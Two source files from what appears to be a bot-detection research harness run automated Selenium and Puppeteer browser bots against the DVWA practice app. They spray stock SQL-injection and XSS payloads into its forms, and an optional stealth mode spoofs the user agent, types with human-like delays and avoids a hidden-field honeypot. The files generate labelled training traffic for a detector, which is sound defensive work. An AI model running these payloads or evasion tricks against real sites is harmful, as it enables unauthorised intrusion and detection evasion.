File: web-harness/generators/selenium_bot/bot.py
"""Selenium spray-bot — Chromium driven via chromedriver (not Playwright).

Different fingerprint than playwright_bot/bot.py even though both render
through Chromium: Selenium uses chromedriver (W3C WebDriver protocol)
where Playwright uses CDP directly. The HTTP request stack and timing
characteristics differ in ways that show up in the per-request log
(navigation timing, header set, fetch initiator) — that's the point.

We use Chrome DevTools Protocol via `execute_cdp_cmd` to set the
X-Cernis-* labels as extra HTTP headers on every subsequent request, so
the capture proxy keys the session correctly. Provenance is written
via `fetch` from inside the browser, which inherits the same cookie
jar (and therefore the same cernis_sid the proxy minted on first nav).
"""

from __future__ import annotations

import json
import os
import random
import sys
import time

import httpx  # noqa: F401  # available for follow-up scripts; not used directly here

sys.path.insert(0, "/app/shared")
from manifest import build_payload, headers_for  # noqa: E402
from target_guard import get_target  # noqa: E402

from selenium import webdriver  # noqa: E402
from selenium.webdriver.chrome.options import Options  # noqa: E402
from selenium.webdriver.chrome.service import Service  # noqa: E402
from selenium.webdriver.common.by import By  # noqa: E402
from selenium.common.exceptions import (  # noqa: E402
    NoSuchElementException, TimeoutException, WebDriverException,
)

LABEL = "selenium_bot"
TARGET = get_target()
TARGET_APP = os.environ.get("CERNIS_TARGET_APP", "dvwa").strip().lower()
SECURITY_LEVEL = os.environ.get("DVWA_SECURITY_LEVEL", "low")
SESSIONS = int(os.environ.get("CERNIS_SESSIONS", "3"))
DVWA_USER = os.environ.get("DVWA_USER", "admin")
DVWA_PASS = os.environ.get("DVWA_PASS", "password")
STEALTH = os.environ.get("CERNIS_STEALTH", "false").strip().lower() in (
    "1", "true", "yes",
)
STEALTH_UA = (
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
)

PAYLOADS = [
    "1' OR '1'='1",
    "<script>alert(1)</script>",
    "'; DROP TABLE users--",
    "<img src=x onerror=alert(1)>",
    "1 UNION SELECT user,password FROM users--",
]

VULN_PATHS = [
    "/vulnerabilities/sqli/",
    "/vulnerabilities/xss_r/",
    "/vulnerabilities/xss_s/",
    "/vulnerabilities/exec/",
]


def _make_driver(label_headers: dict) -> webdriver.Chrome:
    opts = Options()
    opts.binary_location = os.environ.get("CHROME_BIN", "/usr/bin/chromium")
    opts.add_argument("--headless=new")
    opts.add_argument("--no-sandbox")
    opts.add_argument("--disable-dev-shm-usage")
    opts.add_argument("--window-size=1280,800")
    if STEALTH:
        opts.add_argument(f"--user-agent={STEALTH_UA}")
    service = Service(os.environ.get("CHROMEDRIVER_BIN", "/usr/bin/chromedriver"))
    driver = webdriver.Chrome(service=service, options=opts)
    # set X-Cernis-* on every subsequent request via CDP
    driver.execute_cdp_cmd("Network.enable", {})
    driver.execute_cdp_cmd("Network.setExtraHTTPHeaders", {"headers": label_headers})
    return driver


def _human_pause() -> None:
    if STEALTH:
        time.sleep(random.uniform(2.5, 6.5))


def _is_visible_input(driver: webdriver.Chrome, inp) -> bool:
    """Skip off-screen / hidden inputs in stealth mode (avoids
    invisible_field honeypot)."""
    try:
        if not inp.is_displayed():
            return False
        rect = inp.rect
        if rect.get("width", 0) < 5 or rect.get("height", 0) < 5:
            return False
        if rect.get("x", 0) < 0 or rect.get("y", 0) < 0:
            return False
        return True
    except WebDriverException:
        return False


def _record_provenance_in_browser(driver: webdriver.Chrome, payload: dict) -> None:
    """POST /__provenance from inside the page so the cernis_sid cookie travels."""
    script = """
    const payload = arguments[0];
    const done = arguments[1];
    fetch('/__provenance', {
        method: 'POST',
        headers: {'Content-Type': 'application/json'},
        body: JSON.stringify(payload),
        credentials: 'include',
    }).then(r => done(r.status)).catch(_ => done(0));
    """
    driver.set_script_timeout(8)
    try:
        driver.execute_async_script(script, payload)
    except (TimeoutException, WebDriverException) as exc:
        print(f"[{LABEL}] provenance write failed (continuing): {exc}", flush=True)


def _login_dvwa(driver: webdriver.Chrome) -> None:
    driver.get(f"{TARGET}/login.php")
    driver.find_element(By.NAME, "username").send_keys(DVWA_USER)
    driver.find_element(By.NAME, "password").send_keys(DVWA_PASS)
    driver.find_element(By.NAME, "Login").click()
    time.sleep(0.5)


def _attack_page(driver: webdriver.Chrome, path: str) -> None:
    try:
        driver.get(f"{TARGET}{path}")
    except WebDriverException:
        return
    selectors = ('input[type="text"]', "textarea")
    payload = random.choice(PAYLOADS)
    for sel in selectors:
        try:
            inputs = driver.find_elements(By.CSS_SELECTOR, sel)
        except NoSuchElementException:
            continue
        if STEALTH:
            # one visible input, one slow keystroke pass, no fill-all
            inputs = [i for i in inputs if _is_visible_input(driver, i)]
            if not inputs:
                continue
            try:
                inputs[0].clear()
                for ch in payload:
                    inputs[0].send_keys(ch)
                    time.sleep(random.uniform(0.08, 0.18))
            except WebDriverException:
                pass
            break
        for inp in inputs:
            try:
                inp.clear()
                inp.send_keys(payload)
            except WebDriverException:
                pass
    try:
        submit = driver.find_element(
            By.CSS_SELECTOR,
            'input[type="submit"], button[type="submit"]',
        )
        submit.click()
        time.sleep(0.2)
    except (NoSuchElementException, WebDriverException):
        pass
    _human_pause()


def run_session(i: int) -> int:
    payload = build_payload(
        klass="agent", family=LABEL, target_app=TARGET_APP,
        security_level=SECURITY_LEVEL, stealth=STEALTH,
        generator="selenium_bot", generator_version="0.2.0",
        generator_config={"engine": "selenium", "paths": VULN_PATHS,
                          "stealth": STEALTH},
    )
    label_headers = headers_for(payload)
    driver = _make_driver(label_headers)
    n_pages = 0
    try:
        # nav to root first so the proxy mints cernis_sid + provenance writes
        # into a real session
        driver.get(f"{TARGET}/")
        _record_provenance_in_browser(driver, payload)

        if TARGET_APP == "dvwa":
            _login_dvwa(driver)
            for path in VULN_PATHS:
                _attack_page(driver, path)
                n_pages += 1
        else:
            # for non-DVWA targets, just walk a couple of likely-vulnerable
            # endpoints. Phase 2 leaves real per-target attack scripts to
            # the next sweep — this session still produces label-correct
            # negative-class browser traffic that the detector consumes.
            for path in ("/", "/login", "/api"):
                try:
                    driver.get(f"{TARGET}{path}")
                    n_pages += 1
                except WebDriverException:
                    continue
    finally:
        try:
            driver.quit()
        except WebDriverException:
            pass
    return n_pages


def main() -> int:
    mode = "stealth" if STEALTH else "fast"
    print(f"[{LABEL}] target={TARGET} target_app={TARGET_APP} "
          f"mode={mode} sessions={SESSIONS}", flush=True)
    for i in range(SESSIONS):
        t0 = time.time()
        pages = run_session(i)
        print(
            f"[{LABEL}] session {i + 1}/{SESSIONS} pages={pages} "
            f"took={time.time() - t0:.1f}s",
            flush=True,
        )
    print(f"[{LABEL}] done", flush=True)
    return 0


if __name__ == "__main__":
    sys.exit(main())

File: web-harness/generators/puppeteer_bot/bot.js
// Puppeteer spray-bot — Chromium driven via Node + CDP.
//
// Sibling to playwright_bot/bot.py and selenium_bot/bot.py: same engine
// underneath, but a different runtime stack and HTTP client surface,
// which gives the detector a third agent-family fingerprint to learn
// from. Class = agent, family = puppeteer_bot.
//
// X-Cernis-* labels travel on every request via page.setExtraHTTPHeaders.
// Provenance is written via the in-page fetch (inherits cookies from
// the browser jar, including the cernis_sid the proxy mints on first nav).
// Target-guard runs as a pre-exec sh step in the Dockerfile so this
// process never starts against a non-loopback target.

import { createHash } from 'node:crypto';
import puppeteer from 'puppeteer-core';

const LABEL = 'puppeteer_bot';
const TARGET = process.env.CERNIS_TARGET || 'http://capture:8080';
const TARGET_APP = (process.env.CERNIS_TARGET_APP || 'dvwa').toLowerCase();
const SECURITY_LEVEL = process.env.DVWA_SECURITY_LEVEL || 'low';
const SESSIONS = parseInt(process.env.CERNIS_SESSIONS || '3', 10);
const DVWA_USER = process.env.DVWA_USER || 'admin';
const DVWA_PASS = process.env.DVWA_PASS || 'password';
const STEALTH = ['1', 'true', 'yes'].includes(
    (process.env.CERNIS_STEALTH || 'false').toLowerCase()
);
const STEALTH_UA = (
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) ' +
    'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
);

function humanPause() {
    if (!STEALTH) return Promise.resolve();
    const ms = 2500 + Math.random() * 4000;
    return new Promise((res) => setTimeout(res, ms));
}

const PAYLOADS = [
    "1' OR '1'='1",
    "<script>alert(1)</script>",
    "'; DROP TABLE users--",
    "<img src=x onerror=alert(1)>",
    "1 UNION SELECT user,password FROM users--",
];

const VULN_PATHS = [
    '/vulnerabilities/sqli/',
    '/vulnerabilities/xss_r/',
    '/vulnerabilities/xss_s/',
    '/vulnerabilities/exec/',
];

function configSha(cfg) {
    const blob = JSON.stringify(
        Object.keys(cfg).sort().reduce((o, k) => (o[k] = cfg[k], o), {})
    );
    return createHash('blake2b512').update(blob).digest('hex').slice(0, 8);
}

function buildPayload(klass, family, generator, version, config) {
    return {
        class: klass,
        family,
        target_app: TARGET_APP,
        security_level: SECURITY_LEVEL,
        stealth: false,
        generator,
        generator_version: version,
        generator_config_sha: configSha(config || {}),
        extra: {},
    };
}

function labelHeaders(payload) {
    return {
        'X-Cernis-Source': payload.family,
        'X-Cernis-Class': payload.class,
        'X-Cernis-Family': payload.family,
        'X-Cernis-TargetApp': payload.target_app,
        'X-Cernis-SecurityLevel': payload.security_level,
        'X-Cernis-Stealth': payload.stealth ? 'true' : 'false',
    };
}

async function recordProvenance(page, payload) {
    try {
        await page.evaluate(async (p) => {
            await fetch('/__provenance', {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify(p),
                credentials: 'include',
            });
        }, payload);
    } catch (err) {
        console.error(`[${LABEL}] provenance write failed (continuing): ${err}`);
    }
}

async function loginDvwa(page) {
    await page.goto(`${TARGET}/login.php`, { waitUntil: 'domcontentloaded' });
    await page.type('input[name="username"]', DVWA_USER);
    await page.type('input[name="password"]', DVWA_PASS);
    await Promise.all([
        page.waitForNavigation({ waitUntil: 'domcontentloaded' }).catch(() => {}),
        page.click('input[name="Login"]'),
    ]);
}

async function attackPage(page, path) {
    try {
        await page.goto(`${TARGET}${path}`, {
            waitUntil: 'domcontentloaded', timeout: 10000,
        });
    } catch {
        return;
    }
    let inputs = await page.$$(
        'input[type="text"]:not([disabled]):not([readonly]), textarea:not([disabled]):not([readonly])'
    );
    if (!inputs.length) return;
    const payload = PAYLOADS[Math.floor(Math.random() * PAYLOADS.length)];
    if (STEALTH) {
        // Drop off-screen / aria-hidden inputs (the invisible_field
        // honeypot is positioned at -9999px) — fill ONE visible input
        // with a human-typed payload.
        const visible = [];
        for (const inp of inputs) {
            try {
                const box = await inp.boundingBox();
                if (!box) continue;
                if (box.x < 0 || box.y < 0) continue;
                if (box.width < 5 || box.height < 5) continue;
                visible.push(inp);
            } catch {}
        }
        if (!visible.length) return;
        try {
            await visible[0].click({ clickCount: 1 });
            await visible[0].type(payload, { delay: 80 + Math.random() * 100 });
        } catch {}
    } else {
        for (const inp of inputs) {
            try { await inp.evaluate((el) => (el.value = '')); } catch {}
            try { await inp.type(payload); } catch {}
        }
    }
    try {
        const submit = await page.$('input[type="submit"], button[type="submit"]');
        if (submit) await submit.click();
        await page.waitForNetworkIdle({ idleTime: 200, timeout: 3000 }).catch(() => {});
    } catch {}
    await humanPause();
}

async function runSession(browser, sessionIdx) {
    const payload = buildPayload(
        'agent', LABEL, 'puppeteer_bot', '0.2.0',
        { engine: 'puppeteer', paths: VULN_PATHS, stealth: STEALTH },
    );
    payload.stealth = STEALTH;
    const headers = labelHeaders(payload);
    if (STEALTH) headers['User-Agent'] = STEALTH_UA;

    const context = await browser.createBrowserContext();
    const page = await context.newPage();
    if (STEALTH) await page.setUserAgent(STEALTH_UA);
    await page.setExtraHTTPHeaders(headers);

    let pages = 0;
    try {
        await page.goto(`${TARGET}/`, { waitUntil: 'domcontentloaded' }).catch(() => {});
        await recordProvenance(page, payload);

        if (TARGET_APP === 'dvwa') {
            await loginDvwa(page);
            for (const path of VULN_PATHS) {
                await attackPage(page, path);
                pages++;
            }
        } else {
            for (const path of ['/', '/login', '/api']) {
                try {
                    await page.goto(`${TARGET}${path}`, { waitUntil: 'domcontentloaded' });
                    pages++;
                } catch {}
            }
        }
    } finally {
        try { await context.close(); } catch {}
    }
    return pages;
}

async function main() {
    const mode = STEALTH ? 'stealth' : 'fast';
    console.log(`[${LABEL}] target=${TARGET} target_app=${TARGET_APP} mode=${mode} sessions=${SESSIONS}`);
    const browser = await puppeteer.launch({
        headless: true,
        executablePath: process.env.PUPPETEER_EXECUTABLE_PATH || '/usr/bin/chromium',
        args: ['--no-sandbox', '--disable-dev-shm-usage', '--window-size=1280,800'],
    });
    try {
        for (let i = 0; i < SESSIONS; i++) {
            const t0 = Date.now();
            const pages = await runSession(browser, i);
            console.log(
                `[${LABEL}] session ${i + 1}/${SESSIONS} pages=${pages} ` +
                `took=${((Date.now() - t0) / 1000).toFixed(1)}s`
            );
        }
    } finally {
        await browser.close();
    }
    console.log(`[${LABEL}] done`);
}

main().catch((err) => {
    console.error(err);
    process.exit(1);
});
